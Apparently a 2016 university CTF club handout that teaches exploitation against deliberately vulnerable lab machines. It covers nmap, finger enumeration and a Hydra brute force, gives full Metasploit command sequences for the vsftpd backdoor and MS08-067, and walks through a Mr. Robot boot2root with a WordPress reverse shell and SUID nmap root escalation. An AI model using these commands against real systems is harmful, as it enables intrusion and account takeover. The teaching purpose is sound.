To get on mailing list: goo.gl/HjJW7u
To log into WiFi: auctf / !!auctf2016
Contact info: firstname.lastname@example.org - Jeramy
email@example.com - Matthew
firstname.lastname@example.org - Jacob
Going to try something new so no slides; only this.
There are a couple competition related things happening this week – the NSA Codebreakers 2016 challenges started last Friday (09/09)(it’s an excellent start into learning about reverse engineering and runs until December), and CSAW CTF starts this Friday (09/16), which is one of the bigger collegiate undergrad competitions.
First Exploitation Meeting
Now that we’ve scanned the network and learned how nmap works, we can leverage this knowledge in order to find and attack vulnerable boxes. This meeting will go over the most basic for of exploitation - brute forcing. We’ll also touch on basic user enumeration through services, and then apply all of these steps towards breaking into a box from Vulnhub.
Start with Scanning
First we’ll need to see what boxes are alive on the network. Running nmap with the -sP flag should give a quick ping sweep of what’s going on the network, which should look approx. like this:
~# nmap -sP 10.0.1.1-21 Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-09-13 10:26 EDT Nmap scan report for 10.0.1.1 Host is up (0.0053s latency). ... Nmap scan report for 10.0.1.15 Host is up (0.0055s latency). Nmap scan report for 10.0.1.16 Host is up (0.0057s latency). Nmap scan report for 10.0.1.17 Host is up (0.0056s latency). Nmap scan report for 10.0.1.18 Host is up (0.0056s latency). Nmap scan report for 10.0.1.19 Host is up (0.0058s latency). Nmap scan report for 10.0.1.20 Host is up (0.0057s latency). Nmap scan report for 10.0.1.21 Host is up (0.0057s latency). Nmap done: 21 IP addresses (21 hosts up) scanned in 28.08 seconds
The boxes we actually care about (spoiler alert) are in the range from 10.0.1.17-10.0.1.21. Due to time constraints we’ll just scan these 5. We can use nmap or zenmap to get a quick overview of what each of these boxes are doing.
~# nmap -A -vv 10.0.1.17-21 ~# zenmap
I won’t post the results here since they’re pretty hefty.
User enumeration is the act of testing or finding usernames, in order to get a foothold into a box. This can be testing usernames in a login form on a website or by abusing services like snmp. “Finger” was one of the first protocols made for getting user status over a network, and while not widely used today, can easily be abused if found.
The earlier nmap output shows that 10.0.1.17 is running the finger daemon, as well as an ftp server.
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 79/tcp open finger Debian fingerd
If we look into this further, we can use finger to get the currently logged in users.
~# finger @10.0.1.17 Login Name Tty Idle Login Time Office Office Phone clean clean *tty2 2 Sep 12 15:42 ftpuser ftpuser *tty1 18:09 Sep 12 15:41 3130 guest *tty3 2 Sep 13 09:49
Now that we know some potential users, we can try and leverage these to get access to the box. The simplest, yet usually least effective and time consuming way of doing this is through brute forcing.
10.0.1.17 is also running an ftp server on port 21, we can see that it has an ftpuser. We can try bruteforcing the password to see if it is simple enough to crack in a reasonable amount of time.
Hydra is the go-to tool for network logon cracking and supports a number of different services, so let’s give it a shot.
~# gunzip -d /usr/share/wordlists/rockyou.txt.gz ~# hydra -l ftpuser -P /usr/share/wordlists/rockyou.txt ftp://10.0.1.17 Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2016-09-13 10:56:30 [DATA] max 16 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~14008 tries per task [DATA] attacking service ftp on port 21 [ftp] host: 10.0.1.17 login: ftpuser password: [redacted] 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2016-09-13 10:57:19
Now that took less than a minute because I purposefully chose a password early in the wordlist. This isn’t that representative of true bruteforcing which can take forever (literally), like if we were cracking stronger passwords and hashes.
Many of the servers we enumerated earlier were running webservers on port 80. Due to misconfigurations or vulnerabilties in the services used, we can use these as potential attack vectors in order to get into the box. Let’s start with 10.0.1.20.
If we can go to 10.0.1.20 in our browser, we can see that it’s running something called UltimateLAMP which is a purposefully vulnerable / test LAMP (Linux - Apache - MySQL - PHP) server running a million different services, like wordpress.
Knowing that this is running a ton of services, checking for things like injections, xss, or cves in each service could take forever so let’s let robots do it for us. Nikto is a vulnerability scanner (similar to Nessus) that scans web servers for known vulnerabilities.
~# nikto -h http://10.0.1.20 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.0.1.20 + Target Hostname: 10.0.1.20 + Target Port: 80 + Start Time: 2016-09-13 11:05:50 (GMT-4) --------------------------------------------------------------------------- [tons of vulns here] + 8347 requests: 2 error(s) and 40 item(s) reported on remote host + End Time: 2016-09-13 11:11:14 (GMT-4) (101 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
As you can see, there are a million different vulnerabilities, so we’ll have to move onto more specific tools like wpscan, but we’ll look at those later.
Armitage and Metasploit
The Metasploit Framework is the largest open-source framework for developing and executing exploits. Msfconsole and Armitage are the most well-known front-ends for MSF (cli and gui respectively), and will be what we use. Today we’ll focus on Armitage, since using msfconsole is very involved.
First we need to get all the hosts we’re interested in by click Hosts in the top left and adding new ones. We’ll stay with 10.0.1.17-21 to keep it simple. In msfconsole we would type:
msf > hosts --add 10.0.1.17-21
Now we need to rescan them in order to add services to our msf database. This is easy in armitage, you can either right click an individual host and press scan, or go to the top left Hosts menu again and choose an nmap scan. To do an intense scan with host-discovery in msfconsole:
msf > db_nmap -T4 -A -n -v 10.0.1.17-21
Finding attacks is easy as pressing the attacks menu in the top left and then “Find Attacks” and waiting for the loading bar. Make sure that you’ve checked every port and service or you might miss some. Keep in mind there will be a lot of false positives and negatives. It’s just the nature of the game.
We’ll start with 10.0.1.19 which is a Linux box called Metasploitable2, which is a purposefully vulnerable box to test metasploit exploits on. We’ll start with an ftp backdoor in an previous version of the ftp service we bruteforced earlier. Right click the box corresponding to 10.0.1.19 > attack > ftp > vsftod_234_backdoor. A bunch of commands should run at the bottom, and you’ll have a shell by right-clicking the box again and going to Shell
msf > use exploit/unix/ftp/vsftpd_234_backdoor msf exploit(vsftpd_234_backdoor) > set TARGET 0 msf exploit(vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact msf exploit(vsftpd_234_backdoor) > set LHOST <ip> msf exploit(vsftpd_234_backdoor) > set LPORT 27526 msf exploit(vsftpd_234_backdoor) > set RPORT 21 msf exploit(vsftpd_234_backdoor) > set RHOST 10.0.1.19 msf exploit(vsftpd_234_backdoor) > exploit -j
Similarly, we can look at a classic vulnerability in Windows XP / Server 2003: MS08_067 which is a wormable RCE vulnerability in SMB. This was the vulnerability that the Conficker worm used, and was later utilized by Stuxnet.
In the same fashion, all we need to do is right click the box and select the attack: /exploit/windows/smb/ms08_067_netapi. msfconsole equivalent:
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set TARGET 0 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > set LHOST <ip> msf exploit(ms08_067_netapi) > set LPORT 27675 msf exploit(ms08_067_netapi) > set RPORT 445 msf exploit(ms08_067_netapi) > set RHOST 10.0.1.21 msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER msf exploit(ms08_067_netapi) > exploit -j
Bringing it all Together and Adding Complexity
Now we’ll run through a scenario from Vulnhub, an online community for posting vulnerable virtual machine “challenges” where you attempt to get root on a box designed to have specific vulnerabilities (Boot2Root). This one happens to be Mr. Robot themed, and the goal is to find 3 “flags” like we would if we were competing in a CTF competition.
The ip address we’ll focus is 10.0.1.18.
We can use our earlier nmap results to see that the only thing running on the box is a web server on ports 80 and 443. Let’s boot up nikto and see if there are any glaring vulnerabilities. Similar to earlier, we’ll run.
~# nikto -h http://10.0.1.18
The output verifies that this is a wordpress site, and that there is a robots.txt file, which is a file that good-mannered bots check to see where they shouldn’t go. The first flag is located there, along with a .dic file that might come in handy later.
Now we can run wpscan - a more specific wordpress vulnerability scanner. It doesn’t look like there are any RCE vulnerabilties, but we can probably upload a reverse shell if we get the password for a user. We can use the login form to find valid users, like “elliot” and then brute force the password with WPScan. Sadly this will take 4-5 hours. So the password is ER28-0652. This is more representative of actual brute forcing.
~# wpscan -u 10.0.1.18 -e vp
Now let’s load the host up into Armitage and try and upload a reverse shell using /exploit/unix/webapp/wp_admin_shell_upload. Sadly it appears that there is an error when checking if wordpress exists, but I’m pretty sure this is a wordpress blog so let’s check it out.
~# nano -c /usr/share/metasploit-framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
Add a comment (#) to line 69 - fail_with(Failure:: … ) unless wordpress_and_online?
Now reload the module rerun the exploit using the previously gained username and password and a reverse shell. You should get in. You should get dropped into a shell and be able to ‘ls’ the robot home directory. Sadly we can’t access the flag in there, but we do have a password file containing an md5 hash of the password. We could crack it, or we could just google it.
Now we have an account that can access the second flag, but no shell. So we need to use python to spawn one.
~# python -c 'import pty;pty.spawn("/bin/bash")' ~# su robot
Now you can read the second flag, but the third one, located in the /root/ folder requires a root account to access, so we need to look for some sort of privilege escalation. We need a file that runs as root that we can run commands on so let’s look around.
~# find / -perm -u=s -type f 2>/dev/null
That should look at all the files owned by root that we can run, you’ll notice that nmap is in there. Through some research you’ll see that nmap has an interactive mode that can run bash commands so the rest should be easy.
~# nmap --interactive nmap > !sh nmap > id
Now you can get the final flag. Woo. Writeup Credit.